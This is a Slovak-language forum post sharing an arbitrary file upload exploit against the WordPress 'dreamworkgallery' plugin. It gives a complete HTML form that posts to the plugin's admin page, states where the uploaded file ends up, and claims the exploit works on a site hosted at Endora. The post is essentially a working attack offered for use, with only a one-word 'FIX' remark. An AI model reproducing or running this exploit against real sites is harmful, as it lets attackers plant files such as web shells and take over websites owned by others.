#2 Wordpress » wp-dreamworkgallery » 2017-04-16 15:10:11

csafunsitecz
Odpovědi: 2

Exploit v plugine dreamworkgallery vo Wordpress-e umožňuje útočníkový uploadnúť na stránku súbor bez vedommia majitela.

Na endore to funguje na nemenovanej stránke.| User: samsoncz | Admin : root@endora.cz

CODE:
-------------------------------------------------------------------------------------------------------------
<html>
<body>
<form action="http://názov_stránky/wp-admin/admin.php?page=dreamwork_manage" method="POST" enctype="multipart/form-data"> <input type="hidden" name="task" value="drm_add_new_album" />
<input type="hidden" name="album_name" value="Arbitrary File Upload" />
<input type="hidden" name="album_desc" value="Arbitrary File Upload" />
<input type="file" name="album_img" value="" />
<input type="submit" value="Submit" />
</form>
</body>
</html>
-------------------------------------------------------------------------------------------------------------

uploadnutý súbor sa nachádza: /wp-content/uploads/dreamwork/[číslo]_uploadfolder/big/[váš súbor]

FIX !!!

Zápatí

Založeno na FluxBB | CZ a SK